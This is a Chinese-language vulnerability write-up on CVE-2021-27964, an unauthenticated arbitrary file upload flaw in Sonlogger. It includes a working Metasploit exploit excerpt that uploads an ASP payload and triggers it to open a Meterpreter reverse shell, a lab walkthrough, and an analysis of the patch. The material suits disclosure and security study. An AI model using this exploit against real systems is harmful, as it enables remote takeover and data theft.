详细分析 Sonlogger 任意文件上传漏洞 (CVE-2021-27964)

admin

102696
文章

87
评论

2021年5月29日05:20:16评论164 views字数 4046阅读13分29秒阅读模式

详细分析 Sonlogger 任意文件上传漏洞 (CVE-2021-27964) 聚焦源代码安全，网罗国内外最新资讯！

概述

Sonlogger 是土耳其SFC 公司开发的一款应用软件，兼容土耳其《第5651号法》，是一款基于 Web 的 SonicWall 防火墙设备日志分析、报告和跟踪软件。《第5651号法》规定了网络服务提供商所应履行的义务，如进行数据本地化，每年向土耳其信息和通信技术管理局（ICTA）提交两次报告等。Sonlogger 用于协助用户生成符合《第5651号法》规定的合规日志。

SonLogger 6.4.1之前的版本存在安全漏洞 (CVE-2021-27964)，允许上传未经授权的任意文件。攻击者可以向 /Config/SaveUploadedHotspotLogoFile 发送 POST 请求，无需任何身份验证或会话头，也并未检查上传文件的扩展名以及文件内容。利用此漏洞，可以上传恶意文件并访问运行该应用程序的远程服务器，从而获取敏感信息。

漏洞细节

Sonlogger 4.2.3.3的主界面如下：

详细分析 Sonlogger 任意文件上传漏洞 (CVE-2021-27964)

Sonlogger的 ”热点设置-上传” logo界面如下，可知它并未规定所上传文件的扩展名和内容：

详细分析 Sonlogger 任意文件上传漏洞 (CVE-2021-27964)

下一步，进行上传操作并使用 Burpsuite 监听。发现上传时会向 /Config/SaveUploadedHotspotLogoFile 页面发送 POST 请求。且该请求来源于 config/hostspotsettings.js。

详细分析 Sonlogger 任意文件上传漏洞 (CVE-2021-27964)

PoC

编写脚本，生成包含有效载荷的ASP，部分代码如下：

def create_payload    Msf::Util::EXE.to_exe_asp(generate_payload_exe).to_send

下面的部分将有效负载上传到目标系统的 /Assets/temp/hotspot/img/logohotspot.asp 并触发它进行连接：

def exploit    begin      print_good('Generate Payload')      data = create_payload
      boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(5..14))}"      post_data = "--#{boundary}rn"      post_data << "Content-Disposition: form-data; name="file"; filename="#{rand_text_alphanumeric(rand(5..11))}.asp"rn"      post_data << "Content-Type: image/pngrn"      post_data << "rn#{data}rn"      post_data << "--#{boundary}rn"
      res = send_request_cgi(        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, '/Config/SaveUploadedHotspotLogoFile'),        'ctype' => "multipart/form-data; boundary=#{boundary}",        'data' => post_data,        'headers' => {          'Accept' => 'application/json',          'Accept-Language' => 'en-US,en;q=0.5',          'X-Requested-With' => 'XMLHttpRequest'        }      )      unless res        fail_with(Failure::Unreachable, 'No response from server')      end
      unless res.code == 200        fail_with(Failure::Unknown, "Unexpected server response: #{res.code}")       end
      json_res = begin        JSON.parse(res.body)      rescue JSON::ParserError        nil      end
      if json_res.nil? || json_res['Message'] == 'Error in saving file'        fail_with(Failure::UnexpectedReply, 'Error uploading payload')      end
      print_good('Payload has been uploaded')
      handler
      print_status('Executing payload...')      send_request_cgi({        'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'),        'method' => 'GET'      }, 5)    end     rescue StandardError        fail_with(Failure::UnexpectedReply, 'Failed to execute the payload')    end

漏洞利用

使用 VMware 内 kali 虚拟机作为攻击发起主机，以宿主机作为靶机进行攻击。

首先把编写好的脚本放入 metasploit 对应的目录之下，之后在 msfconsole下reload_all 重新载入所有模块，并运行脚本。

详细分析 Sonlogger 任意文件上传漏洞 (CVE-2021-27964)

检索需利用的 modules，使用 show options 命令查看配置项，并对目标主机RHOSTS, RPORT 等参数进行设置。

详细分析 Sonlogger 任意文件上传漏洞 (CVE-2021-27964)

分别查看攻击机和靶机的ip地址，以确认LHOST 被设置为 192.168.18.128。

详细分析 Sonlogger 任意文件上传漏洞 (CVE-2021-27964)

与虚拟机同网段的宿主机 ip 地址为 192.168.18.1，故设置 RHOSTS 为该 ip 地址，并运行脚本。

详细分析 Sonlogger 任意文件上传漏洞 (CVE-2021-27964)

实施 exploit 生成 meterpreter。

详细分析 Sonlogger 任意文件上传漏洞 (CVE-2021-27964)

结果，成功获得了 uid 以及系统信息。

详细分析 Sonlogger 任意文件上传漏洞 (CVE-2021-27964)

修复版本分析

详细分析 Sonlogger 任意文件上传漏洞 (CVE-2021-27964)

分析发现，修复后版本的 hotspotsetting.js 部分代码如下：

var handleLogoDropzone = function () {
    Dropzone.autoDiscover = false; // otherwise will be initialized twice    var myDropzoneOptions = {        maxFilesize: 5,        addRemoveLinks: true,        clickable: true,    };    var myDropzone = new Dropzone('#m-dropzone-three', myDropzoneOptions);    var mockFile = { name: $('#hotspotlogonameinput').val(), size: 12345 };    myDropzone.options.addedfile.call(myDropzone, mockFile);    myDropzone.options.thumbnail.call(myDropzone, mockFile, "../../Assets/hotspot/img/" + $('#hotspotlogonameinput').val() + "?dummy=" + Math.round((new Date()).getTime() / 1000) + "");}

分析可知，Sonlogger 只会读取来自 Assets/hotspot/img 文件夹内的 logo 缩略图，而实际上传到 Sonlogger 内的 logo 被上传至 Assets/temp/hotspot/img 内，并未真正的修改保存。如下图所示，上传的图片提示保存成功，但刷新后仍然是之前的图片。

详细分析 Sonlogger 任意文件上传漏洞 (CVE-2021-27964)